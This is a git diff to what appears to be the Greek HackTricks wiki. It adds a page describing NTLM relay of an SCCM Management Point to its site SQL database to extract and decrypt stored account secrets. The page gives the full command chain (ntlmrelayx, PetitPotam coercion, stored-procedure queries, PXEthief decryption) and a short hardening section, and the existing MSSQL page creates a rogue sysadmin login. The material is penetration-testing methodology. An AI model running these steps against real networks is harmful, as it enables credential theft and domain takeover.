diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index b09540790..09ba11160 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -283,6 +283,7 @@
   - [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md)
   - [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
   - [Resource-based Constrained Delegation](windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md)
+  - [Sccm Management Point Relay Sql Policy Secrets](windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md)
   - [Security Descriptors](windows-hardening/active-directory-methodology/security-descriptors.md)
   - [SID-History Injection](windows-hardening/active-directory-methodology/sid-history-injection.md)
   - [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md)
diff --git a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
index f76dacb6b..d140d16d9 100644
--- a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
+++ b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
@@ -176,7 +176,7 @@ Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResu
 
 ## MSSQL Εμπιστευμένοι Σύνδεσμοι
 
-Εάν μια παρουσία MSSQL είναι εμπιστευμένη (σύνδεσμος βάσης δεδομένων) από μια διαφορετική παρουσία MSSQL. Εάν ο χρήστης έχει δικαιώματα πάνω στη εμπιστευμένη βάση δεδομένων, θα μπορεί να **χρησιμοποιήσει τη σχέση εμπιστοσύνης για να εκτελέσει ερωτήματα και στην άλλη παρουσία**. Αυτές οι εμπιστοσύνες μπορούν να αλυσωθούν και σε κάποιο σημείο ο χρήστης μπορεί να είναι σε θέση να βρει κάποια κακώς ρυθμισμένη βάση δεδομένων όπου μπορεί να εκτελέσει εντολές.
+Εάν μια παρουσία MSSQL είναι εμπιστευμένη (σύνδεσμος βάσης δεδομένων) από μια διαφορετική παρουσία MSSQL. Εάν ο χρήστης έχει δικαιώματα πάνω στη εμπιστευμένη βάση δεδομένων, θα είναι σε θέση να **χρησιμοποιήσει τη σχέση εμπιστοσύνης για να εκτελέσει ερωτήματα και στην άλλη παρουσία**. Αυτές οι εμπιστοσύνες μπορούν να αλυσωθούν και σε κάποιο σημείο ο χρήστης μπορεί να είναι σε θέση να βρει κάποια κακώς ρυθμισμένη βάση δεδομένων όπου μπορεί να εκτελέσει εντολές.
 
 **Οι σύνδεσμοι μεταξύ των βάσεων δεδομένων λειτουργούν ακόμη και σε διασυνδέσεις δασών.**
 
@@ -247,12 +247,12 @@ EXEC sp_linkedservers;
 
 #### Εκτέλεση ερωτημάτων σε αξιόπιστο σύνδεσμο
 
-Εκτέλεση ερωτημάτων μέσω του συνδέσμου (παράδειγμα: βρείτε περισσότερους συνδέσμους στην νέα προσβάσιμη περίπτωση):
+Εκτέλεση ερωτημάτων μέσω του συνδέσμου (παράδειγμα: βρείτε περισσότερους συνδέσμους στη νέα προσβάσιμη περίπτωση):
 ```sql
 select * from openquery("dcorp-sql1", 'select * from master..sysservers')
 ```
 > [!WARNING]
-> Ελέγξτε πού χρησιμοποιούνται τα διπλά και τα απλά εισαγωγικά, είναι σημαντικό να τα χρησιμοποιείτε με αυτόν τον τρόπο.
+> Ελέγξτε πού χρησιμοποιούνται τα διπλά και τα μονά εισαγωγικά, είναι σημαντικό να τα χρησιμοποιείτε με αυτόν τον τρόπο.
 
 ![](<../../images/image (643).png>)
 
@@ -274,13 +274,20 @@ SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", '
 EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
 EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
 ```
-## Τοπική Κλιμάκωση Δικαιωμάτων
+## Τοπική Κλιμάκωση Προνομίων
 
-Ο **τοπικός χρήστης MSSQL** συνήθως έχει έναν ειδικό τύπο δικαιώματος που ονομάζεται **`SeImpersonatePrivilege`**. Αυτό επιτρέπει στον λογαριασμό να "παριστάνει έναν πελάτη μετά την αυθεντικοποίηση".
+Ο **τοπικός χρήστης MSSQL** συνήθως έχει έναν ειδικό τύπο προνομίου που ονομάζεται **`SeImpersonatePrivilege`**. Αυτό επιτρέπει στον λογαριασμό να "παριστάνει έναν πελάτη μετά την αυθεντικοποίηση".
 
 Μια στρατηγική που έχουν προτείνει πολλοί συγγραφείς είναι να αναγκάσουν μια υπηρεσία SYSTEM να αυθεντικοποιηθεί σε μια κακόβουλη ή υπηρεσία man-in-the-middle που δημιουργεί ο επιτιθέμενος. Αυτή η κακόβουλη υπηρεσία μπορεί στη συνέχεια να παριστάνει την υπηρεσία SYSTEM ενώ προσπαθεί να αυθεντικοποιηθεί.
 
 [SweetPotato](https://github.com/CCob/SweetPotato) έχει μια συλλογή από αυτές τις διάφορες τεχνικές που μπορούν να εκτελούνται μέσω της εντολής `execute-assembly` του Beacon.
 
 
+
+### NTLM Relay Σημείου Διαχείρισης SCCM (Εξαγωγή Μυστικών OSD)
+Δείτε πώς οι προεπιλεγμένοι ρόλοι SQL του SCCM **Σημείων Διαχείρισης** μπορούν να καταχραστούν για να εξάγουν τον Λογαριασμό Πρόσβασης Δικτύου και τα μυστικά Task-Sequence απευθείας από τη βάση δεδομένων του ιστότοπου:
+{{#ref}}
+sccm-management-point-relay-sql-policy-secrets.md
+{{#endref}}
+
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md b/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md
new file mode 100644
index 000000000..ce53330af
--- /dev/null
+++ b/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md
@@ -0,0 +1,155 @@
+# SCCM Management Point NTLM Relay to SQL – OSD Policy Secret Extraction
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## TL;DR
+Με την πίεση ενός **System Center Configuration Manager (SCCM) Management Point (MP)** να αυθεντικοποιηθεί μέσω SMB/RPC και **αναμεταδίδοντας** αυτόν τον λογαριασμό μηχανής NTLM στη **βάση δεδομένων του ιστότοπου (MSSQL)** αποκτάτε δικαιώματα `smsdbrole_MP` / `smsdbrole_MPUserSvc`.  Αυτοί οι ρόλοι σας επιτρέπουν να καλέσετε ένα σύνολο αποθηκευμένων διαδικασιών που εκθέτουν **Operating System Deployment (OSD)** blobs (διαπιστευτήρια Network Access Account, μεταβλητές Task-Sequence, κ.λπ.).  Τα blobs είναι κωδικοποιημένα/κρυπτογραφημένα σε hex αλλά μπορούν να αποκωδικοποιηθούν και να αποκρυπτογραφηθούν με **PXEthief**, αποκαλύπτοντας κείμενα μυστικά.
+
+High-level chain:
+1. Discover MP & site DB ↦ unauthenticated HTTP endpoint `/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA`.
+2. Start `ntlmrelayx.py -t mssql://<SiteDB> -ts -socks`.
+3. Coerce MP using **PetitPotam**, PrinterBug, DFSCoerce, κ.λπ.
+4. Through the SOCKS proxy connect with `mssqlclient.py -windows-auth` as the relayed **<DOMAIN>\\<MP-host>$** account.
+5. Execute:
+* `use CM_<SiteCode>`
+* `exec MP_GetMachinePolicyAssignments N'<UnknownComputerGUID>',N''`
+* `exec MP_GetPolicyBody N'<PolicyID>',N'<Version>'`   (or `MP_GetPolicyBodyAfterAuthorization`)
+6. Strip `0xFFFE` BOM, `xxd -r -p` → XML  → `python3 pxethief.py 7 <hex>`.
+
+Secrets such as `OSDJoinAccount/OSDJoinPassword`, `NetworkAccessUsername/Password`, κ.λπ. ανακτώνται χωρίς να αγγίξετε PXE ή πελάτες.
+
+---
+
+## 1. Enumerating unauthenticated MP endpoints
+Η επέκταση ISAPI του MP **GetAuth.dll** εκθέτει αρκετές παραμέτρους που δεν απαιτούν αυθεντικοποίηση (εκτός αν ο ιστότοπος είναι μόνο PKI):
+
+| Parameter | Purpose |
+|-----------|---------|
+| `MPKEYINFORMATIONMEDIA` | Επιστρέφει το δημόσιο κλειδί πιστοποίησης υπογραφής του ιστότοπου + GUIDs των συσκευών *x86* / *x64* **All Unknown Computers**. |
+| `MPLIST` | Λίστα με κάθε Management-Point στον ιστότοπο. |
+| `SITESIGNCERT` | Επιστρέφει το πιστοποιητικό υπογραφής του Primary-Site (αναγνωρίζει τον διακομιστή ιστότοπου χωρίς LDAP). |
+
+Grab the GUIDs that will act as the **clientID** for later DB queries:
+```bash
+curl http://MP01.contoso.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format -
+```
+---
+
+## 2. Μεταβίβαση του λογαριασμού μηχανής MP στο MSSQL
+```bash
+# 1. Start the relay listener (SMB→TDS)
+ntlmrelayx.py -ts -t mssql://10.10.10.15 -socks -smb2support
+
+# 2. Trigger authentication from the MP (PetitPotam example)
+python3 PetitPotam.py 10.10.10.20 10.10.10.99 \
+-u alice -p P@ssw0rd! -d CONTOSO -dc-ip 10.10.10.10
+```
+Όταν ενεργοποιηθεί η εξαναγκαστική διαδικασία, θα πρέπει να δείτε κάτι σαν:
+```
+[*] Authenticating against mssql://10.10.10.15 as CONTOSO/MP01$ SUCCEED
+[*] SOCKS: Adding CONTOSO/MP01$@10.10.10.15(1433)
+```
+---
+
+## 3. Εντοπισμός πολιτικών OSD μέσω αποθηκευμένων διαδικασιών
+Συνδεθείτε μέσω του SOCKS proxy (θύρα 1080 από προεπιλογή):
+```bash
+proxychains mssqlclient.py CONTOSO/MP01$@10.10.10.15 -windows-auth
+```
+Μεταβείτε στη βάση δεδομένων **CM_<SiteCode>** (χρησιμοποιήστε τον τριψήφιο κωδικό τοποθεσίας, π.χ. `CM_001`).
+
+### 3.1  Βρείτε GUIDs Άγνωστων Υπολογιστών (προαιρετικό)
+```sql
+USE CM_001;
+SELECT SMS_Unique_Identifier0
+FROM dbo.UnknownSystem_DISC
+WHERE DiscArchKey = 2; -- 2 = x64, 0 = x86
+```
+### 3.2  Λίστα ανατεθειμένων πολιτικών
+```sql
+EXEC MP_GetMachinePolicyAssignments N'e9cd8c06-cc50-4b05-a4b2-9c9b5a51bbe7', N'';
+```
+Κάθε γραμμή περιέχει `PolicyAssignmentID`,`Body` (hex), `PolicyID`, `PolicyVersion`.
+
+Επικεντρωθείτε σε πολιτικές:
+* **NAAConfig**  – Διαπιστευτήρια λογαριασμού πρόσβασης δικτύου
+* **TS_Sequence** – Μεταβλητές ακολουθίας εργασιών (OSDJoinAccount/Password)
+* **CollectionSettings** – Μπορεί να περιέχει λογαριασμούς εκτέλεσης
+
+### 3.3  Ανάκτηση πλήρους σώματος
+Εάν έχετε ήδη `PolicyID` & `PolicyVersion` μπορείτε να παραλείψετε την απαίτηση clientID χρησιμοποιώντας:
+```sql
+EXEC MP_GetPolicyBody N'{083afd7a-b0be-4756-a4ce-c31825050325}', N'2.00';
+```
+> ΣΗΜΑΝΤΙΚΟ: Στο SSMS αυξήστε το “Μέγιστο Πλήθος Χαρακτήρων που Ανακτήθηκαν” (>65535) ή το blob θα κοπεί.
+
+---
+
+## 4. Αποκωδικοποιήστε & αποκρυπτογραφήστε το blob
+```bash
+# Remove the UTF-16 BOM, convert from hex → XML
+echo 'fffe3c003f0078…' | xxd -r -p > policy.xml
+
+# Decrypt with PXEthief (7 = decrypt attribute value)
+python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml)
+```
+Ανακτημένα μυστικά παράδειγμα:
+```
+OSDJoinAccount : CONTOSO\\joiner
+OSDJoinPassword: SuperSecret2025!
+NetworkAccessUsername: CONTOSO\\SCCM_NAA
+NetworkAccessPassword: P4ssw0rd123
+```
+---
+
+## 5. Σχετικοί ρόλοι & διαδικασίες SQL
+Κατά την αναμετάδοση, η σύνδεση αντιστοιχίζεται σε:
+* `smsdbrole_MP`
+* `smsdbrole_MPUserSvc`
+
+Αυτοί οι ρόλοι εκθέτουν δεκάδες δικαιώματα EXEC, τα κύρια που χρησιμοποιούνται σε αυτή την επίθεση είναι:
+
+| Αποθηκευμένη Διαδικασία | Σκοπός |
+|-------------------------|--------|
+| `MP_GetMachinePolicyAssignments` | Λίστα πολιτικών που εφαρμόζονται σε ένα `clientID`. |
+| `MP_GetPolicyBody` / `MP_GetPolicyBodyAfterAuthorization` | Επιστρέφει το πλήρες σώμα πολιτικής. |
+| `MP_GetListOfMPsInSiteOSD` | Επιστρέφεται από τη διαδρομή `MPKEYINFORMATIONMEDIA`. |
+
+Μπορείτε να ελέγξετε τη πλήρη λίστα με:
+```sql
+SELECT pr.name
+FROM   sys.database_principals AS dp
+JOIN   sys.database_permissions AS pe ON pe.grantee_principal_id = dp.principal_id
+JOIN   sys.objects AS pr ON pr.object_id = pe.major_id
+WHERE  dp.name IN ('smsdbrole_MP','smsdbrole_MPUserSvc')
+AND  pe.permission_name='EXECUTE';
+```
+---
+
+## 6. Ανίχνευση & Σκληροποίηση
+1. **Παρακολούθηση συνδέσεων MP** – οποιοσδήποτε λογαριασμός υπολογιστή MP που συνδέεται από μια IP που δεν είναι η κεντρική του ≈ relay.
+2. Ενεργοποιήστε την **Εκτενή Προστασία για Αυθεντικοποίηση (EPA)** στη βάση δεδομένων του ιστότοπου (`PREVENT-14`).
+3. Απενεργοποιήστε το μη χρησιμοποιούμενο NTLM, επιβάλετε την υπογραφή SMB, περιορίστε το RPC (
+οι ίδιες μετρήσεις που χρησιμοποιούνται κατά του `PetitPotam`/`PrinterBug`).
+4. Σκληρύνετε την επικοινωνία MP ↔ DB με IPSec / αμοιβαίο TLS.
+
+---
+
+## Δείτε επίσης
+* Βασικές αρχές NTLM relay:
+{{#ref}}
+../ntlm/README.md
+{{#endref}}
+
+* Κατάχρηση MSSQL & μετα-εκμετάλλευση:
+{{#ref}}
+abusing-ad-mssql.md
+{{#endref}}
+
+
+
+## Αναφορές
+- [Θα ήθελα να μιλήσω με τον διευθυντή σας: Κλέβοντας μυστικά με Management Point Relays](https://specterops.io/blog/2025/07/15/id-like-to-speak-to-your-manager-stealing-secrets-with-management-point-relays/)
+- [PXEthief](https://github.com/MWR-CyberSec/PXEThief)
+- [Διαχειριστής Κακής Διαμόρφωσης – ELEVATE-4 & ELEVATE-5](https://github.com/subat0mik/Misconfiguration-Manager)
+{{#include ../../banners/hacktricks-training.md}}